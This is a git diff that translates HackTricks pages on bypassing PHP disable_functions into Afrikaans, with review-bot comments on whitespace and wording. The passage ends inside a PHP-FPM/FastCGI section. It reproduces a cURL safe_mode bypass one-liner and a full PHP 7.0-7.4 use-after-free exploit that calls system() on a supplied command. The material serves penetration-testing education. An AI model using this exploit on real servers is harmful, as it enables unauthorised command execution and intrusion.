- - diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md index a67b874b9..96e017f93 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md @@ -1,50 +1,42 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# PHP 5.2.4 and 5.2.5 PHP cURL - -From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) +# PHP 5.2.4 en 5.2.5 PHP cURL +Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) ```text source: http://www.securityfocus.com/bid/27413/info - + PHP cURL is prone to a 'safe mode' security-bypass vulnerability. - + Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks. - -The issue affects PHP 5.2.5 and 5.2.4. - + +The issue affects PHP 5.2.5 and 5.2.4. + var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__))); ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
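Review bot: This hunk changes whitespace inside the ```text block that quotes the securityfocus advisory (`source: http://www.securityfocus.com/bid/27413/info`): the blank separator lines are removed and re-added with different trailing whitespace, and `The issue affects PHP 5.2.5 and 5.2.4.` is deleted and re-inserted, although that block is quoted English that is not being translated. Quoted advisory text and program output should stay byte-identical in a translation PR; drop these whitespace-only lines so the hunk contains just the heading (`# PHP 5.2.4 en 5.2.5 PHP cURL`), the `Vanaf` line and the banner. The PoC line `var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));` is unchanged, which is correct.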
- - diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md index 600730159..aecd3baf2 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md @@ -1,28 +1,27 @@ -# disable\_functions bypass - PHP 7.0-7.4 (\*nix only) +# disable\_functions omseil - PHP 7.0-7.4 (\*nix slegs)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## PHP 7.0-7.4 (\*nix only) - -From [https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php) +## PHP 7.0-7.4 (\*nix slegs) +Vanaf [https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php) ```php a); - $backtrace = (new Exception)->getTrace(); # ;) - if(!isset($backtrace[1]['args'])) { # PHP >= 7.4 - $backtrace = debug_backtrace(); - } - } - } +class Vuln { +public $a; +public function __destruct() { +global $backtrace; +unset($this->a); +$backtrace = (new Exception)->getTrace(); # ;) +if(!isset($backtrace[1]['args'])) { # PHP >= 7.4 +$backtrace = debug_backtrace(); +} +} +} - class Helper { - public $a, $b, $c, $d; - } +class Helper { +public $a, $b, $c, $d; +} - function str2ptr(&$str, $p = 0, $s = 8) { - $address = 0; - for($j = $s-1; $j >= 0; $j--) { - $address <<= 8; - $address |= ord($str[$p+$j]); - } - return $address; - } +function str2ptr(&$str, $p = 0, $s = 8) { +$address = 0; +for($j = $s-1; $j >= 0; $j--) { +$address <<= 8; +$address |= ord($str[$p+$j]); +} +return $address; +} - function ptr2str($ptr, $m = 8) { - $out = ""; - for ($i=0; $i < $m; $i++) { - $out .= chr($ptr & 0xff); - $ptr >>= 8; - } - return $out; - } +function ptr2str($ptr, $m = 8) { +$out = ""; +for ($i=0; $i < $m; $i++) { +$out .= chr($ptr & 0xff); +$ptr >>= 8; +} +return $out; +} - function write(&$str, $p, $v, $n = 8) { - $i = 0; - for($i = 0; $i < $n; $i++) { - $str[$p + $i] = chr($v & 0xff); - $v >>= 8; - } - } +function write(&$str, $p, $v, $n = 8) { +$i = 0; +for($i = 0; $i < $n; $i++) { +$str[$p + $i] = chr($v & 0xff); +$v >>= 8; +} +} - function leak($addr, $p = 0, $s = 8) { - global $abc, $helper; - write($abc, 0x68, $addr + $p - 0x10); - $leak = strlen($helper->a); - if($s != 8) { $leak %= 2 << ($s * 8) - 1; } - return $leak; - } +function leak($addr, $p = 0, $s = 8) 
{ +global $abc, $helper; +write($abc, 0x68, $addr + $p - 0x10); +$leak = strlen($helper->a); +if($s != 8) { $leak %= 2 << ($s * 8) - 1; } +return $leak; +} - function parse_elf($base) { - $e_type = leak($base, 0x10, 2); +function parse_elf($base) { +$e_type = leak($base, 0x10, 2); - $e_phoff = leak($base, 0x20); - $e_phentsize = leak($base, 0x36, 2); - $e_phnum = leak($base, 0x38, 2); +$e_phoff = leak($base, 0x20); +$e_phentsize = leak($base, 0x36, 2); +$e_phnum = leak($base, 0x38, 2); - for($i = 0; $i < $e_phnum; $i++) { - $header = $base + $e_phoff + $i * $e_phentsize; - $p_type = leak($header, 0, 4); - $p_flags = leak($header, 4, 4); - $p_vaddr = leak($header, 0x10); - $p_memsz = leak($header, 0x28); +for($i = 0; $i < $e_phnum; $i++) { +$header = $base + $e_phoff + $i * $e_phentsize; +$p_type = leak($header, 0, 4); +$p_flags = leak($header, 4, 4); +$p_vaddr = leak($header, 0x10); +$p_memsz = leak($header, 0x28); - if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write - # handle pie - $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr; - $data_size = $p_memsz; - } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec - $text_size = $p_memsz; - } - } +if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write +# handle pie +$data_addr = $e_type == 2 ? 
$p_vaddr : $base + $p_vaddr; +$data_size = $p_memsz; +} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec +$text_size = $p_memsz; +} +} - if(!$data_addr || !$text_size || !$data_size) - return false; +if(!$data_addr || !$text_size || !$data_size) +return false; - return [$data_addr, $text_size, $data_size]; - } +return [$data_addr, $text_size, $data_size]; +} - function get_basic_funcs($base, $elf) { - list($data_addr, $text_size, $data_size) = $elf; - for($i = 0; $i < $data_size / 8; $i++) { - $leak = leak($data_addr, $i * 8); - if($leak - $base > 0 && $leak - $base < $data_addr - $base) { - $deref = leak($leak); - # 'constant' constant check - if($deref != 0x746e6174736e6f63) - continue; - } else continue; +function get_basic_funcs($base, $elf) { +list($data_addr, $text_size, $data_size) = $elf; +for($i = 0; $i < $data_size / 8; $i++) { +$leak = leak($data_addr, $i * 8); +if($leak - $base > 0 && $leak - $base < $data_addr - $base) { +$deref = leak($leak); +# 'constant' constant check +if($deref != 0x746e6174736e6f63) +continue; +} else continue; - $leak = leak($data_addr, ($i + 4) * 8); - if($leak - $base > 0 && $leak - $base < $data_addr - $base) { - $deref = leak($leak); - # 'bin2hex' constant check - if($deref != 0x786568326e6962) - continue; - } else continue; +$leak = leak($data_addr, ($i + 4) * 8); +if($leak - $base > 0 && $leak - $base < $data_addr - $base) { +$deref = leak($leak); +# 'bin2hex' constant check +if($deref != 0x786568326e6962) +continue; +} else continue; - return $data_addr + $i * 8; - } - } +return $data_addr + $i * 8; +} +} - function get_binary_base($binary_leak) { - $base = 0; - $start = $binary_leak & 0xfffffffffffff000; - for($i = 0; $i < 0x1000; $i++) { - $addr = $start - 0x1000 * $i; - $leak = leak($addr, 0, 7); - if($leak == 0x10102464c457f) { # ELF header - return $addr; - } - } - } +function get_binary_base($binary_leak) { +$base = 0; +$start = $binary_leak & 0xfffffffffffff000; +for($i = 0; $i < 0x1000; $i++) { 
+$addr = $start - 0x1000 * $i; +$leak = leak($addr, 0, 7); +if($leak == 0x10102464c457f) { # ELF header +return $addr; +} +} +} - function get_system($basic_funcs) { - $addr = $basic_funcs; - do { - $f_entry = leak($addr); - $f_name = leak($f_entry, 0, 6); +function get_system($basic_funcs) { +$addr = $basic_funcs; +do { +$f_entry = leak($addr); +$f_name = leak($f_entry, 0, 6); - if($f_name == 0x6d6574737973) { # system - return leak($addr + 8); - } - $addr += 0x20; - } while($f_entry != 0); - return false; - } +if($f_name == 0x6d6574737973) { # system +return leak($addr + 8); +} +$addr += 0x20; +} while($f_entry != 0); +return false; +} - function trigger_uaf($arg) { - # str_shuffle prevents opcache string interning - $arg = str_shuffle(str_repeat('A', 79)); - $vuln = new Vuln(); - $vuln->a = $arg; - } +function trigger_uaf($arg) { +# str_shuffle prevents opcache string interning +$arg = str_shuffle(str_repeat('A', 79)); +$vuln = new Vuln(); +$vuln->a = $arg; +} - if(stristr(PHP_OS, 'WIN')) { - die('This PoC is for *nix systems only.'); - } +if(stristr(PHP_OS, 'WIN')) { +die('This PoC is for *nix systems only.'); +} - $n_alloc = 10; # increase this value if UAF fails - $contiguous = []; - for($i = 0; $i < $n_alloc; $i++) - $contiguous[] = str_shuffle(str_repeat('A', 79)); +$n_alloc = 10; # increase this value if UAF fails +$contiguous = []; +for($i = 0; $i < $n_alloc; $i++) +$contiguous[] = str_shuffle(str_repeat('A', 79)); - trigger_uaf('x'); - $abc = $backtrace[1]['args'][0]; +trigger_uaf('x'); +$abc = $backtrace[1]['args'][0]; - $helper = new Helper; - $helper->b = function ($x) { }; +$helper = new Helper; +$helper->b = function ($x) { }; - if(strlen($abc) == 79 || strlen($abc) == 0) { - die("UAF failed"); - } +if(strlen($abc) == 79 || strlen($abc) == 0) { +die("UAF failed"); +} - # leaks - $closure_handlers = str2ptr($abc, 0); - $php_heap = str2ptr($abc, 0x58); - $abc_addr = $php_heap - 0xc8; +# leaks +$closure_handlers = str2ptr($abc, 0); +$php_heap = 
str2ptr($abc, 0x58); +$abc_addr = $php_heap - 0xc8; - # fake value - write($abc, 0x60, 2); - write($abc, 0x70, 6); +# fake value +write($abc, 0x60, 2); +write($abc, 0x70, 6); - # fake reference - write($abc, 0x10, $abc_addr + 0x60); - write($abc, 0x18, 0xa); +# fake reference +write($abc, 0x10, $abc_addr + 0x60); +write($abc, 0x18, 0xa); - $closure_obj = str2ptr($abc, 0x20); +$closure_obj = str2ptr($abc, 0x20); - $binary_leak = leak($closure_handlers, 8); - if(!($base = get_binary_base($binary_leak))) { - die("Couldn't determine binary base address"); - } +$binary_leak = leak($closure_handlers, 8); +if(!($base = get_binary_base($binary_leak))) { +die("Couldn't determine binary base address"); +} - if(!($elf = parse_elf($base))) { - die("Couldn't parse ELF header"); - } +if(!($elf = parse_elf($base))) { +die("Couldn't parse ELF header"); +} - if(!($basic_funcs = get_basic_funcs($base, $elf))) { - die("Couldn't get basic_functions address"); - } +if(!($basic_funcs = get_basic_funcs($base, $elf))) { +die("Couldn't get basic_functions address"); +} - if(!($zif_system = get_system($basic_funcs))) { - die("Couldn't get zif_system address"); - } +if(!($zif_system = get_system($basic_funcs))) { +die("Couldn't get zif_system address"); +} - # fake closure object - $fake_obj_offset = 0xd0; - for($i = 0; $i < 0x110; $i += 8) { - write($abc, $fake_obj_offset + $i, leak($closure_obj, $i)); - } +# fake closure object +$fake_obj_offset = 0xd0; +for($i = 0; $i < 0x110; $i += 8) { +write($abc, $fake_obj_offset + $i, leak($closure_obj, $i)); +} - # pwn - write($abc, 0x20, $abc_addr + $fake_obj_offset); - write($abc, 0xd0 + 0x38, 1, 4); # internal func type - write($abc, 0xd0 + 0x68, $zif_system); # internal func handler +# pwn +write($abc, 0x20, $abc_addr + $fake_obj_offset); +write($abc, 0xd0 + 0x38, 1, 4); # internal func type +write($abc, 0xd0 + 0x68, $zif_system); # internal func handler - ($helper->b)($cmd); - exit(); +($helper->b)($cmd); +exit(); } ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
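Review bot: Every line of the mm0r1 PoC in this hunk is rewritten solely to strip its leading indentation (`class Vuln`, `class Helper`, `str2ptr`, `ptr2str`, `write`, `leak`, `parse_elf`, `get_basic_funcs`, `get_binary_base`, `get_system`, `trigger_uaf` and the main body all lose their indentation) while the code itself is unchanged. That turns a translation change into a diff that touches the whole exploit, in which a real code change would be invisible to a reviewer, and it makes the file diverge from the upstream `exploit.php` it cites at `https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php`, so a later resync will conflict. Keep fenced code byte-identical and limit the hunk to the heading `## PHP 7.0-7.4 (\*nix slegs)`, the `Vanaf` line and the banner. Two smaller consistency points in the same file: the header bullet says `hacktruuks` and the footer bullet `hacking-truuks`, and the PDF phrase is `HackTricks aflaai in PDF-formaat` in the header but `laai HackTricks in PDF af` in the footer; the shared banner should read the same in both places.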
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md index c4a2e3772..3d21ec528 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md @@ -1,390 +1,387 @@ -# disable\_functions bypass - php-fpm/FastCGI +# disable\_functions omseil - php-fpm/FastCGI
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
## PHP-FPM -**PHP-FPM** is presented as a **superior alternative** to the standard PHP FastCGI, offering features that are particularly **beneficial for websites with high traffic**. It operates through a master process that oversees a collection of worker processes. For a PHP script request, it's the web server that initiates a **FastCGI proxy connection to the PHP-FPM service**. This service has the capability to **receive requests either via network ports on the server or Unix sockets**. +**PHP-FPM** word voorgestel as 'n **betere alternatief** vir die standaard PHP FastCGI, met funksies wat veral **voordeel kan bied vir webwerwe met hoë verkeer**. Dit werk deur middel van 'n meesterproses wat 'n versameling werkerprosesse oorsien. Vir 'n PHP-skripsieversoek is dit die webbediener wat 'n **FastCGI-proksiverbinding na die PHP-FPM-diens** inisieer. Hierdie diens het die vermoë om versoek te **ontvang via netwerkpoorte op die bediener of Unix-aansluitings**. -Despite the intermediary role of the proxy connection, PHP-FPM needs to be operational on the same machine as the web server. The connection it uses, while proxy-based, differs from conventional proxy connections. Upon receiving a request, an available worker from PHP-FPM processes it—executing the PHP script and then forwarding the results back to the web server. After a worker concludes processing a request, it becomes available again for upcoming requests. +Ten spyte van die bemiddelende rol van die proksiverbinding, moet PHP-FPM bedryfsklaar wees op dieselfde masjien as die webbediener. Die verbinding wat dit gebruik, alhoewel proksigebaseerd, verskil van konvensionele proksiverbindings. Wanneer 'n versoek ontvang word, verwerk 'n beskikbare werker van PHP-FPM dit - voer die PHP-skripsie uit en stuur dan die resultate terug na die webbediener. Nadat 'n werker 'n versoek voltooi het, word dit weer beskikbaar vir komende versoek. -## But what is CGI and FastCGI? +## Maar wat is CGI en FastCGI? 
### CGI -Normally web pages, files and all of the documents which are transferred from the web server to the browser are stored in a specific public directory such as home/user/public\_html. **When the browser requests certain content, the server checks this directory and sends the required file to the browse**r. +Normaalweg word webbladsye, lêers en al die dokumente wat van die webbediener na die blaaier oorgedra word, gestoor in 'n spesifieke openbare gids soos home/gebruiker/public\_html. **Wanneer die blaaier sekere inhoud aanvra, kontroleer die bediener hierdie gids en stuur die vereiste lêer na die blaaier**. -If **CGI** is installed on the server, the specific cgi-bin directory is also added there, for example home/user/public\_html/cgi-bin. CGI scripts are stored in this directory. **Each file in the directory is treated as an executable program**. When accessing a script from the directory, the server sends request to the application, responsible for this script, instead of sending file's content to the browser. **After the input data processing is completed, the application sends the output data** to the web server which forwards the data to the HTTP client. +As **CGI** op die bediener geïnstalleer is, word die spesifieke cgi-bin-gids ook daarby gevoeg, byvoorbeeld home/gebruiker/public\_html/cgi-bin. CGI-skripsies word in hierdie gids gestoor. **Elke lêer in die gids word behandel as 'n uitvoerbare program**. Wanneer 'n skripsie vanuit die gids benader word, stuur die bediener 'n versoek na die toepassing wat verantwoordelik is vir hierdie skripsie, in plaas daarvan om die inhoud van die lêer na die blaaier te stuur. **Nadat die invoerdata verwerking voltooi is, stuur die toepassing die uitvoerdata** na die webbediener wat die data na die HTTP-kliënt stuur. 
-For example, when the CGI script [http://mysitename.com/**cgi-bin/file.pl**](http://mysitename.com/\*\*cgi-bin/file.pl\*\*) is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. (explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)) +Byvoorbeeld, wanneer die CGI-skripsie [http://mysitename.com/**cgi-bin/file.pl**](http://mysitename.com/\*\*cgi-bin/file.pl\*\*) benader word, sal die bediener die toepaslike Perl-toepassing deur CGI laat loop. Die data wat gegenereer word deur die uitvoering van die skripsie, sal deur die toepassing na die webbediener gestuur word. Die bediener sal op sy beurt die data na die blaaier oordra. As die bediener nie CGI gehad het nie, sou die blaaier die **.pl**-lêerkode self vertoon het. (verduideliking van [hier](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)) ### FastCGI -[FastCGI](https://en.wikipedia.org/wiki/FastCGI) is a newer web technology, an improved [CGI](http://en.wikipedia.org/wiki/Common\_Gateway\_Interface) version as the main functionality remains the same. +[FastCGI](https://en.wikipedia.org/wiki/FastCGI) is 'n nuwer webtegnologie, 'n verbeterde weergawe van [CGI](http://en.wikipedia.org/wiki/Common\_Gateway\_Interface) waarvan die hooffunksionaliteit dieselfde bly. -The need to develop FastCGI is that Web was arisen by applications' rapid development and complexity, as well to address the scalability shortcomings of CGI technology. 
To meet those requirements [Open Market](http://en.wikipedia.org/wiki/Open\_Market) introduced **FastCGI – a high performance version of the CGI technology with enhanced capabilities.** +Die behoefte om FastCGI te ontwikkel, is ontstaan deur die vinnige ontwikkeling en kompleksiteit van toepassings in die Web, asook om die skaalbaarheidstekortkominge van CGI-tegnologie aan te spreek. Om aan hierdie vereistes te voldoen, het [Open Market](http://en.wikipedia.org/wiki/Open\_Market) **FastCGI - 'n hoë prestasie weergawe van die CGI-tegnologie met verbeterde vermoëns -** bekendgestel. -## disable\_functions bypass +## disable\_functions omseil -It's possible to run PHP code abusing the FastCGI and avoiding the `disable_functions` limitations. +Dit is moontlik om PHP-kode uit te voer deur die FastCGI te misbruik en die beperkings van `disable_functions` te omseil. ### Via Gopherus {% hint style="danger" %} -I'm not sure if this is working in modern versions because I tried once and it didn't execute anything. Please, if you have more information about this contact me via \[**PEASS & HackTricks telegram group here**]\([**https://t.me/peass**](https://t.me/peass)), or twitter \[**@carlospolopm**]\([**https://twitter.com/hacktricks_live**](https://twitter.com/hacktricks_live))**.** +Ek is nie seker of dit werk in moderne weergawes nie, omdat ek dit een keer probeer het en dit het niks uitgevoer nie. 
